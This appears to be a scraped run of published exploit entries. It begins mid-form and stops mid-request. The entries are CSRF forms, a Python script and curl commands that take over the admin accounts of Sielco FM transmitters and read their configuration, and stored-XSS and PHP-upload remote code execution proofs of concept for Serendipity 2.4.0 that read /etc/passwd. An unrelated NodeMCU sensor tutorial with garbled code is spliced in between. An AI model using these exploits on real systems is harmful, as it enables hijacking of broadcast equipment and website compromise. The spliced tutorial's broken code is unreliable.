<input type="hidden" name="auth3" value="2" />
<input type="submit" value="Adminize!" />
</form>
</body>
</html>
<!--
## Exploit Title: Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
2.12 (EXC120GX)
2.11 (EXC300GX)
2.10 (EXC1600GX)
2.10 (EXC2000GX)
2.08 (EXC1600GX)
2.08 (EXC1000GX)
2.07 (EXC3000GX)
2.06 (EXC5000GX)
1.7.7 (EXC30GT)
1.7.4 (EXC300GT)
1.7.4 (EXC100GT)
1.7.4 (EXC5000GT)
1.6.3 (EXC1000GT)
1.5.4 (EXC120GT)
Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.
Desc: The application suffers from improper access control when
editing users. A user with Read permissions can manipulate users,
passwords and permissions by sending a single HTTP POST request
with modified parameters and edit other users' names, passwords
and permissions including admin password.
Tested on: lwIP/2.1.1
Web/3.0.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5756
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5756.php
26.01.2023
-->
<html>
<body>
<form action="http://transmitter/protect/users.htm" method="POST">
<input type="hidden" name="pwd0" value="PWDCHANGED" /> <!-- This will set/modify admin pwd -->
<input type="hidden" name="pwd0bis" value="PWDCHANGED" /> <!-- This will set/modify admin pwd -->
<input type="hidden" name="user1" value="" /> <!-- This will set/modify user1 -->
<input type="hidden" name="pwd1" value="" /> <!-- This will set/modify user1 pwd -->
<input type="hidden" name="pwd1bis" value="" /> <!-- This will set/modify user1 pwd -->
<input type="hidden" name="auth1" value="0" /> <!-- This will set user1 read perm -->
<input type="hidden" name="user2" value="" /> <!-- This will set/modify user2 -->
<input type="hidden" name="pwd2" value="" /> <!-- This will set/modify user2 pwd -->
<input type="hidden" name="pwd2bis" value="" /> <!-- This will set/modify user2 pwd -->
<input type="hidden" name="auth2" value="0" /> <!-- This will set user2 read perm -->
<input type="hidden" name="user3" value="" /> <!-- This will set/modify user3 -->
<input type="hidden" name="pwd3" value="" /> <!-- This will set/modify user3 pwd -->
<input type="hidden" name="pwd3bis" value="" /> <!-- This will set/modify user3 pwd -->
<input type="hidden" name="auth3" value="0" /> <!-- This will set user3 read perm -->
<input type="submit" value="Modify admin pwd, delete all users" />
</form>
</body>
</html>
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
PolyEco1000 CPU:1.9.4 FPGA:10.19
PolyEco1000 CPU:1.9.3 FPGA:10.19
PolyEco500 CPU:1.7.0 FPGA:10.16
PolyEco300 CPU:2.0.2 FPGA:10.19
PolyEco300 CPU:2.0.0 FPGA:10.19
Summary: PolyEco is the innovative family of high-end digital
FM transmitters of Sielco. They are especially suited as high
performance power system exciters or compact low-mid power
transmitters. The same cabinet may in fact be fitted with 50,
100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
1000).
All features can be controlled via the large touch-screen display
4.3" or remotely. Many advanced features are inside by default
in the basic version such as: stereo and RDS encoder, audio
change-over, remote-control via LAN and SNMP, "FFT" spectral
analysis of the audio sources, SFN synchronization and much more.
Desc: Improper access control occurs when the application provides
direct access to objects based on user-supplied input. As a result
of this vulnerability attackers can bypass authorization and access
resources behind protected pages.
Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2023-5768
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5768.php
26.01.2023
--
index.htm:
----------
54: function dologin() {
55: var hash = hex_md5($('#password').val() + id);
56: $.get('/login.cgi', {
57: user: $('#user').val(),
58: password: hash,
59: id: id
60: }).done(function (data) {
61: var dati = $.parseXML(data);
62: id = $(dati).find('id').text();
63: user = $(dati).find('u').text();
64: if (id == 0)
65: window.location.href = '/index.htm';
66: else {
67: scriviCookie('polyeco', id, 180);
68: if (user >= 3)
69: window.location.href = '/protect/factory.htm';
70: else
71: window.location.href = '/protect/index.htm';
72: }
73: });
74: }
The function 'dologin()' in index.htm is called when a user submits a login form.
It starts by calculating a hash of the user-entered password and a variable 'id'
using the hex_md5 function. Then it makes an HTTP GET request to the 'login.cgi'
endpoint with the user's entered username, the calculated password hash and the
'id' variable as parameters. If the request is successful, the function parses the
XML data returned from the server, extracting the values of the 'id' and 'u' elements.
Then it checks the value of the 'id' variable, if it's equal to 0 then it redirects
the user to '/index.htm', otherwise, it writes a cookie called 'polyeco' with the
value of 'id' and expires after 180 days.
After that it checks the value of the 'user' variable, if it's greater than or equal
to 3, it redirects the user to '/protect/factory.htm', otherwise it redirects the
user to '/protect/index.htm'. An attacker can exploit this by modifying the client-side
JavaScript to always set the 'user' variable to a high value (4), or by tampering with
the data sent to the server during the login process to change the value of the 'user'
variable. It also works if the server's response variable 'user' is modified.
<!--
## Exploit Title: Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.12 (EXC5000GX)
2.12 (EXC120GX)
2.11 (EXC300GX)
2.10 (EXC1600GX)
2.10 (EXC2000GX)
2.08 (EXC1600GX)
2.08 (EXC1000GX)
2.07 (EXC3000GX)
2.06 (EXC5000GX)
1.7.7 (EXC30GT)
1.7.4 (EXC300GT)
1.7.4 (EXC100GT)
1.7.4 (EXC5000GT)
1.6.3 (EXC1000GT)
1.5.4 (EXC120GT)
Summary: Sielco designs and produces FM radio transmitters
for professional broadcasting. The in-house laboratory develops
standard and customised solutions to meet all needs. Whether
digital or analogue, each product is studied to ensure reliability,
resistance over time and a high standard of safety. Sielco
transmitters are distributed throughout the world and serve
many radios in Europe, South America, Africa, Oceania and China.
Desc: The application suffers from a privilege escalation vulnerability.
A user with Read permissions can elevate his/her privileges by sending
a HTTP POST request setting the parameter 'auth1' or 'auth2' or 'auth3'
to integer value '1' for Write or '2' for Admin permissions.
Tested on: lwIP/2.1.1
Web/3.0.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5755
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5755.php
26.01.2023
-->
<html>
<body>
<form action="http://transmitter/protect/users.htm" method="POST">
<input type="hidden" name="pwd0" value="" />
<input type="hidden" name="pwd0bis" value="" />
<input type="hidden" name="user1" value="" />
<input type="hidden" name="pwd1" value="" />
<input type="hidden" name="pwd1bis" value="" />
<input type="hidden" name="auth1" value="" />
<input type="hidden" name="user2" value="test" />
<input type="hidden" name="pwd2" value="" />
<input type="hidden" name="pwd2bis" value="" />
<input type="hidden" name="auth2" value="2" />
<input type="hidden" name="user3" value="" />
<input type="hidden" name="pwd3" value="" />
<input type="hidden" name="pwd3bis" value="" />
<input type="hidden" name="auth3" value="" />
<input type="submit" value="Escalate" />
</form>
</body>
</html>
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit
## Exploit Author: LiquidWorm
#
#
# Sielco PolyEco Digital FM Transmitter 2.0.6 Authentication Bypass Exploit
#
#
# Vendor: Sielco S.r.l
# Product web page: https://www.sielco.org
# Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
# PolyEco1000 CPU:1.9.4 FPGA:10.19
# PolyEco1000 CPU:1.9.3 FPGA:10.19
# PolyEco500 CPU:1.7.0 FPGA:10.16
# PolyEco300 CPU:2.0.2 FPGA:10.19
# PolyEco300 CPU:2.0.0 FPGA:10.19
#
# Summary: PolyEco is the innovative family of high-end digital
# FM transmitters of Sielco. They are especially suited as high
# performance power system exciters or compact low-mid power
# transmitters. The same cabinet may in fact be fitted with 50,
# 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
# 1000).
#
# All features can be controlled via the large touch-screen display
# 4.3" or remotely. Many advanced features are inside by default
# in the basic version such as: stereo and RDS encoder, audio
# change-over, remote-control via LAN and SNMP, "FFT" spectral
# analysis of the audio sources, SFN synchronization and much more.
#
# Desc: The application suffers from an authentication bypass and
# account takeover/lockout vulnerability that can be triggered by
# directly calling the users object and effectively modifying the
# password of the two constants user/role (user/admin). This can
# be exploited by an unauthenticated adversary by issuing a single
# POST request to the vulnerable endpoint and gain unauthorized
# access to the affected device with administrative privileges.
#
# Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2023-5769
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5769.php
#
#
# 26.01.2023
#
#
import requests
print( '''
.- _ _ -.
/ / \\ \\
( ( (` (-o-) `) ) )
\ \_ ` -+- ` _/ /
`- -+- -`
-+-
-+-
-+-
-+-
-+-
-+-
/ \\
*****************************************************
! Sielco PolyEco Authentication Bypass Script !
*****************************************************
Please note that this script is for educational and
ethical purposes only. Using it for unauthorized
access or malicious activities is strictly prohibited
and can have serious legal and ethical consequences.
The responsibility of using this script in a lawful
and ethical manner lies solely with the user. The
author or creator of this script shall not be held
responsible for any unlawful or unethical activities
performed by the users.
''' )
url = input( ' Enter the URL (e.g. http://host:8090): ' )
if not 'http' in url :
url = 'http://{}'.format( url )
user = input( ' Enter the desired role (e.g. user or admin): ')
if user not in [ 'user', 'admin' ] :
exit( ' Only \'user\' or \'admin\' please.' )
password = input( ' Enter the desired password: ' )
end = '/protect/users.htm'
payload = {}
if user == "user" :
payload[ 'pwd_admin' ] = ''
payload[ 'pwd_user' ] = password
elif user == 'admin' :
payload[ 'pwd_admin' ] = password
payload[ 'pwd_user' ] = ''
r = requests.post( url + end, data = payload )
if r.status_code == 200 :
print( '\n MSG: OK.' )
else:
print( '\n MSG: ERROR!' )
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
PolyEco1000 CPU:1.9.4 FPGA:10.19
PolyEco1000 CPU:1.9.3 FPGA:10.19
PolyEco500 CPU:1.7.0 FPGA:10.16
PolyEco300 CPU:2.0.2 FPGA:10.19
PolyEco300 CPU:2.0.0 FPGA:10.19
Summary: PolyEco is the innovative family of high-end digital
FM transmitters of Sielco. They are especially suited as high
performance power system exciters or compact low-mid power
transmitters. The same cabinet may in fact be fitted with 50,
100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
1000).
All features can be controlled via the large touch-screen display
4.3" or remotely. Many advanced features are inside by default
in the basic version such as: stereo and RDS encoder, audio
change-over, remote-control via LAN and SNMP, "FFT" spectral
analysis of the audio sources, SFN synchronization and much more.
Desc: Improper access control occurs when the application provides
direct access to objects based on user-supplied input. As a result
of this vulnerability attackers can bypass authorization and access
resources behind protected pages. The application interface allows
users to perform certain actions via HTTP requests without performing
any validity checks to verify the requests. This can be exploited
to perform certain actions and manipulate the RDS text display.
Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2023-5767
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5767.php
26.01.2023
--
POST /protect/rds.htm HTTP/1.1
Host: RADIOFM
rds_inta=1
rds_intb=0
rds_pi=381
rds_ps=ZSL
rds_rta=www.zeroscience.mk
rds_rtb
rds_rtt=0
rds_tp=0
rds_tp=1
rds_ta=0
rds_ms=0
rds_pty=4
rds_ptyn=
rds_ecc=00
rds_ct=0
rds_level=90
rds_psd=0
rds_psd1
rds_pst1=0
rds_psd5
rds_pst5=0
rds_psd2
rds_pst2=0
rds_psd6
rds_pst6=0
rds_psd3
rds_pst3=0
rds_psd7
rds_pst7=0
rds_psd4
rds_pst4=0
rds_psd8
rds_pst8=0
rds_di_pty=0
rds_di_cmp=0
rds_di_cmp=1
rds_di_st=0
rds_di_art=0
rds_di_art=1
a0=90
a1=9
a2=26
a3=115
a4=0
a5=0
a6=0
a7=0
a8=0
a9=0
a10=0
a11=0
a12=0
a13=0
a14=0
a15=0
a16=0
a17=0
a18=0
a19=0
a20=0
a21=0
a22=0
a23=0
a24=0
In this tutorial, you will learn how to use the DHT11 temperature and humidity sensor on a NodeMCU. And understand how the temperature and humidity sensor works, and how to view the values read by the sensor through the serial monitor.
Equipment List
NodeMCU development board one DHT11 temperature and humidity sensor one
(DHT11 module)
(NodeMcu board)
DHT11 detects water vapor by measuring the resistance between two electrodes. A moisturizing substrate with electrodes on the surface of the humidity detection component.
When water vapor is absorbed by the substrate, ions are released by the substrate, and this process will increase the conductivity between the electrodes.
The resistance change between the two electrodes is proportional to the relative humidity.
Higher relative humidity reduces the resistance between electrodes, while lower relative humidity increases the resistance between electrodes.
How to connect DHT11 on NodeMCU
Connecting the DHT11 to the NodeMCU is simple, but the connection method varies depending on whether you are using a 3-pin sensor or a 4-pin sensor.
The connection method is as follows:
The +3V pin of the nodemcu is marked on the DHT11 with the (+ or VCC) pin.
DHT11 is marked with the (S or OUT) pin to connect to the D4V pin of nodemcu.
The GND pin of the nodemcu connected to the GND pin marked with the (- or GND) pin on DHT11.
The code is as follows
#include SimpleDHT.h
//for DHT11,
//VCC: 5V or 3V
//GND: GND
//DATA: 2
int pinDHT11=2;
SimpleDHT11 dht11(pinDHT11);
void setup() {
Serial.begin(115200);
}
void loop() {
//start working.
Serial.println('=================================');
Serial.println('Sample DHT11.');
//read without samples.
byte temperature=0;
byte humidity=0;
int err=SimpleDHTErrSuccess;
if ((err=dht11.read(temperature, humidity, NULL)) !=SimpleDHTErrSuccess) {
Serial.print('Read DHT11 failed, err='); Serial.println(err); delay(1000);
return;
}
Serial.print('Sample OK:');
Serial.print((int)temperature); Serial.print(' *C, ');
Serial.print((int)humidity); Serial.println(' H');
//DHT11 sampling rate is 1HZ.
delay(1500);
}github address
User Demo
DHT11+WEB version
Let's take a look at the effect first
Feedback the DHT11 data through the web server.
Development ideas
We first need to install two libraries DHT and Adafruit Unified Sensor
The code is as follows:
#include ESP8266WiFi.h
#include ESP8266WebServer.h
#include 'DHT.h'
//Uncomment one of the lines below for whatever DHT sensor type you're using!
#define DHTTYPE DHT11 //DHT 11
//#define DHTTYPE DHT21 //DHT 21 (AM2301)
//#define DHTTYPE DHT22 //DHT 22 (AM2302), AM2321
/*Put your SSID Password*/
const char* ssid='kali'; //Enter SSID here
const char* password='12345678900'; //Enter Password here
ESP8266WebServer server(80);
//DHT Sensor
uint8_t DHTPin=D4;
//Initialize DHT sensor.
DHT dht(DHTPin, DHTTYPE);
float Temperature;
float Humidity;
void setup() {
Serial.begin(115200);
delay(100);
pinMode(DHTPin, INPUT);
dht.begin();
Serial.println('Connecting to ');
Serial.println(ssid);
//connect to your local wi-fi network
WiFi.begin(ssid, password);
//check wi-fi is connected to wi-fi network
while (WiFi.status() !=WL_CONNECTED) {
delay(1000);
Serial.print('.');
}
Serial.println('');
Serial.println('WiFi connected.');
Serial.print('Got IP:'); Serial.println(WiFi.localIP());
server.on('/', handle_OnConnect);
server.onNotFound(handle_NotFound);
server.begin();
Serial.println('HTTP server started');
}
void loop() {
server.handleClient();
}
void handle_OnConnect() {
Temperature=dht.readTemperature(); //Gets the values of the temperature
Humidity=dht.readHumidity(); //Gets the values of the humidity
server.send(200, 'text/html', SendHTML(Temperature, Humidity));
}
void handle_NotFound(){
server.send(404, 'text/plain', 'Not found');
}
String SendHTML(float Temperaturestat,float Humiditystat){
String ptr='!DOCTYPE html html\n';
ptr +='head meta name=\'viewport\' content=\'width=device-width, initial-scale=1.0, user-scalable=no\'\n';
ptr +='link href=\'https://fonts.googleapis.com/css?family=Open+Sans:300,400,600\' rel=\'stylesheet\'\n';
ptr +='meta charset=\'UTF-8\'\n';
ptr +='titlePriess's nest—smart thermometer/title\n';
ptr +='stylehtml { font-family: 'Open Sans', sans-serif; display: block; margin: 0px auto; text-align: center;color: #333333;}\n';
ptr +='body{margin-top: 50px;}\n';
ptr +='h1 {margin: 50px auto 30px;}\n';
ptr +=' .wd {margin: 50px auto 30px;width: auto;color: #f39c12}\n';
ptr +=' .wd1 {margin: 50px auto 30px;width: auto;color: #3498db}\n';
ptr +='.side-by-side{display: inline-block;vertical-align: middle;position: relative;}\n';
ptr +='.humidity-icon{background-color: #3498db;width: 30px;height: 30px;border-radius: 50%;line-height: 36px;}\n';
ptr +='.humidity-text{font-weight: 600;padding-left: 15px;font-size: 19px;width: 160px;text-align: left;}\n';
ptr +='.humidity{font-weight: 300;font-size: 60px;color: #3498db;}\n';
ptr +='.temperature-icon{background-color: #f39c12;width: 30px;height: 30px;border-radius: 50%;line-height: 40px;}\n';
ptr +='.temperature-text{font-weight: 600;padding-left: 15px;font-size: 19px;width: 160px;text-align: left;}\n';
ptr +='.temperature{font-weight: 300;font-size: 60px;color: #f39c12;}\n';
ptr +='.superscript{font-size: 17px;font-weight: 600;position: absolute;right: -20px;top: 15px;}\n';
ptr +='.data{padding: 10px;}\n';
ptr +='/style\n';
ptr +='/head\n';
ptr +='body\n';
ptr +='div id=\'webpage\'\n';
ptr +='h1 indoor greenhouse detection system/h1\n';
ptr +='div class=\'data\'\n';
ptr +='div class=\'side-by-side temperature-icon\'\n';
ptr +='svg version=\'1.1\' id=\'Layer_1\' xmlns=\'http://www.w3.org/2000/svg\' xmlns:xlink=\'http://www.w3.org/1999/xlink\' x=\'0px\' y=\'0px\'\n';
ptr +='width=\'9.915px\' height=\'22px\' viewBox=\'0 0 9.915 22\' enable-background=\'new 0 0 9.915 22\' xml:space=\'preserve\'\n';
ptr +='path fill=\'#FFFFFF\' d=\'M3.498,0.53c0.377-0.331,0.877-0.501,1.374-0.527C5.697-0.04,6.522,0.421,6.924,1.142\n';
ptr +='c0.237,0.399,0.315,0.871,0.311,1.33C7.229,5.856,7.245,9.24,7.227,12.625c1.019,0.539,1.855,1.424,2.301,2.491\n';
ptr +='c0.491,1.163,0.518,2.514,0.062,3.693c-0.414,1.102-1.24,2.038-2.276,2.594c-1.056,0.583-2.331,0.743-3.501,0.463\n';
ptr +='c-1.417-0.323-2.659-1.314-3.3-2.617C0.014,18.26-0.115,17.104,0.1,16.022c0.296-1.443,1.274-2.717,2.58-3.394\n';
ptr +='c0.013-3.44,0-6.881,0.007-10.322C2.674,1.634,2.974,0.955,3.498,0.53z\'/\n';
ptr +='/svg\n';
ptr +='/div\n';
ptr +='div class=\'side-by-side temperature-text\'Indoor temperature: /div\n';
ptr +='div class=\'side-by-side temperature\'';
ptr +=(int)Temperaturestat;
ptr +='span class=\'superscript\'°C/span/div\n';
ptr +='/div\n';
ptr +='div class=\'data\'\n';
ptr +='div class=\'side-by-side humidity-icon\'\n';
ptr +='svg version=\'1.1\' id=\'Layer_2\' xmlns=\'http://www.w3.org/2000/svg\' xmlns:xlink=\'http://www.w3.org/1999/xlink\' x=\'0px\' y=\'0px\'\n\'; width=\'12px\' height=\'17.955px\' viewBox=\'0 0 13 17.955\' enable-background=\'new 0 0 13 17.955\' xml:space=\'preserve\'\n';
ptr +='path fill=\'#FFFFFF\' d=\'M1.819,6.217C3.139,4.064,6.5,0,6.5,0s3.363,4.064,4.681,6.217c1.793,2.926,2.133,5.05,1.571,7.057\n';
ptr +='c-0.438,1.574-2.264,4.681-6.252,4.681c-3.988,0-5.813-3.107-6.252-4.681C-0.313,11.267,0.026,9.143,1.819,6.217\'/path\n';
ptr +='/svg\n';
ptr +='/div\n';
ptr +='div class=\'side-by-side humidity-text\'Indoor humidity: /div\n';
ptr +='div class=\'side-by-side humidity\'';
ptr +=(int)Humiditystat;
ptr +='span class=\'superscript\'%/span/div\n';
ptr +='/div\n';
//Define the temperature variable and assign the value to use for logical judgment.
int wd=Temperaturestat ;
if (wd=30){
ptr +='div class=\'wd\'Hi~ Baby, the weather is so hot today, so inject heat prevention! /div\n';
}
if (29=wdwd20){
ptr +='div class=\'wd1\'Hi~ Baby, the weather is nice today, so let's have fun! /div\n';
}
if (wd10){
ptr +='div class=\'side-by-side humidity-text\'Hi~ The weather is cold today, so wear more clothes and be careful to catch a cold! /div\n';
}
ptr +='/div\n';
ptr +='/body\n';
ptr +='/html\n';
return ptr;
}I added a warm reminder based on the source code! When the temperature is in different ranges, different greetings are prompted.
//Define the temperature variable and assign the value to use for logical judgment.
int wd=Temperaturestat ;
if (wd=30){
ptr +='div class=\'wd\'Hi~ Baby, the weather is so hot today, so inject heat prevention! /div\n';
}
if (29=wdwd10){
ptr +='div class=\'wd1\'Hi~ Baby, the weather is nice today, so let's have fun! /div\n';
}
if (wd=10){
ptr +='div class=\'side-by-side humidity-text\'Hi~ The weather is cold today, so wear more clothes and be careful to catch a cold! /div\n';
}
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
PolyEco1000 CPU:1.9.4 FPGA:10.19
PolyEco1000 CPU:1.9.3 FPGA:10.19
PolyEco500 CPU:1.7.0 FPGA:10.16
PolyEco300 CPU:2.0.2 FPGA:10.19
PolyEco300 CPU:2.0.0 FPGA:10.19
Summary: PolyEco is the innovative family of high-end digital
FM transmitters of Sielco. They are especially suited as high
performance power system exciters or compact low-mid power
transmitters. The same cabinet may in fact be fitted with 50,
100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
1000).
All features can be controlled via the large touch-screen display
4.3" or remotely. Many advanced features are inside by default
in the basic version such as: stereo and RDS encoder, audio
change-over, remote-control via LAN and SNMP, "FFT" spectral
analysis of the audio sources, SFN synchronization and much more.
Desc: The application suffers from an authentication bypass,
account takeover/lockout and elevation of privileges vulnerability
that can be triggered by directly calling the users object and
effectively modifying the password of the two constants user/role
(user/admin). This can be exploited by an unauthenticated adversary
by issuing a single POST request to the vulnerable endpoint and
gain unauthorized access to the affected device with administrative
privileges.
Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2023-5765
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5765.php
26.01.2023
--
# Change admin pwd
$ curl -X POST -F "pwd_admin=t00t" -F "pwd_user=" http://RADIOFM/protect/users.htm
## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure
## Exploit Author: LiquidWorm
Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
PolyEco1000 CPU:1.9.4 FPGA:10.19
PolyEco1000 CPU:1.9.3 FPGA:10.19
PolyEco500 CPU:1.7.0 FPGA:10.16
PolyEco300 CPU:2.0.2 FPGA:10.19
PolyEco300 CPU:2.0.0 FPGA:10.19
Summary: PolyEco is the innovative family of high-end digital
FM transmitters of Sielco. They are especially suited as high
performance power system exciters or compact low-mid power
transmitters. The same cabinet may in fact be fitted with 50,
100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
1000).
All features can be controlled via the large touch-screen display
4.3" or remotely. Many advanced features are inside by default
in the basic version such as: stereo and RDS encoder, audio
change-over, remote-control via LAN and SNMP, "FFT" spectral
analysis of the audio sources, SFN synchronization and much more.
Desc: Sielco PolyEco is affected by an information disclosure
vulnerability due to improper access control enforcement. An
unauthenticated remote attacker can exploit this, via a specially
crafted request to gain access to sensitive information.
Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience
Advisory ID: ZSL-2023-5766
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5766.php
26.01.2023
--
$ curl -s http://RADIOFM/factory.ssi
$ curl -s http://RADIOFM/rds.ssi
$ curl -s http://RADIOFM/ip.ssi
$ curl -s http://RADIOFM/alarm.ssi
$ curl -s http://RADIOFM/i2s.ssi
$ curl -s http://RADIOFM/time.ssi
$ curl -s http://RADIOFM/fft.ssi
$ curl -s http://RADIOFM/info.ssi
$ curl -s http://RADIOFM/status.ssi
$ curl -s http://RADIOFM/statusx.ssi
$ curl -s http://RADIOFM/audio.ssi
$ curl -s http://RADIOFM/smtp.ssi
$ curl -s http://RADIOFM/rf.ssi
$ curl -s http://RADIOFM/rfa.ssi
$ curl -s http://RADIOFM/ping.ssi
$ curl -s http://RADIOFM/lan.ssi
$ curl -s http://RADIOFM/kappa.ssi
$ curl -s http://RADIOFM/dbrt.ssi
$ curl -s http://RADIOFM/audiom.ssi
$ curl -s http://RADIOFM/log.ssi
Exploit Title: Serendipity 2.4.0 - Cross-Site Scripting (XSS)
Author: Mirabbas Ağalarov
Application: Serendipity
Version: 2.4.0
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://docs.s9y.org/
Software Link: https://docs.s9y.org/downloads.html
Date of found: 13.04.2023
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1.Anyone who has the authority to create the new entry can do this
payload: hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E
POST /serendipity/serendipity_admin.php? HTTP/1.1
Host: localhost
Content-Length: 730
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=c74c7da50976c82e628d7a8dfdb7c9e3ebc8188b; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b
Connection: close
serendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=&serendipity%5Btimestamp%5D=1681366826&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=ae9b8ae35a756c24f9552a021ee81d56&serendipity%5Btitle%5D=asdf&serendipity%5Bbody%5D=hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E&serendipity%5Bextended%5D=&serendipity%5Bchk_timestamp%5D=1681366826&serendipity%5Bnew_date%5D=2023-04-13&serendipity%5Bnew_time%5D=10%3A20&serendipity%5Bisdraft%5D=false&serendipity%5Ballow_comments%5D=true&serendipity%5Bpropertyform%5D=true&serendipity%5Bproperties%5D%5Baccess%5D=public&ignore_password=&serendipity%5Bproperties%5D%5Bentrypassword%5D=&serendipity%5Bchange_author%5D=1
2. visit the entry you created
Exploit Title: Serendipity 2.4.0 - Remote Code Execution (RCE) (Authenticated)
Application: Serendipity
Version: 2.4.0
Bugs: Remote Code Execution (RCE) (Authenticated) via file upload
Technology: PHP
Vendor URL: https://docs.s9y.org/
Software Link: https://docs.s9y.org/downloads.html
Date of found: 13.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
If we load the poc.phar file in the image field while creating a category, we can run commands on the system.
<?php echo system("cat /etc/passwd"); ?>
I wrote a file with the above payload, a poc.phar extension, and uploaded it.
Visit to http://localhost/serendipity/uploads/poc.phar
poc request:
POST /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC HTTP/1.1
Host: localhost
Content-Length: 1561
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
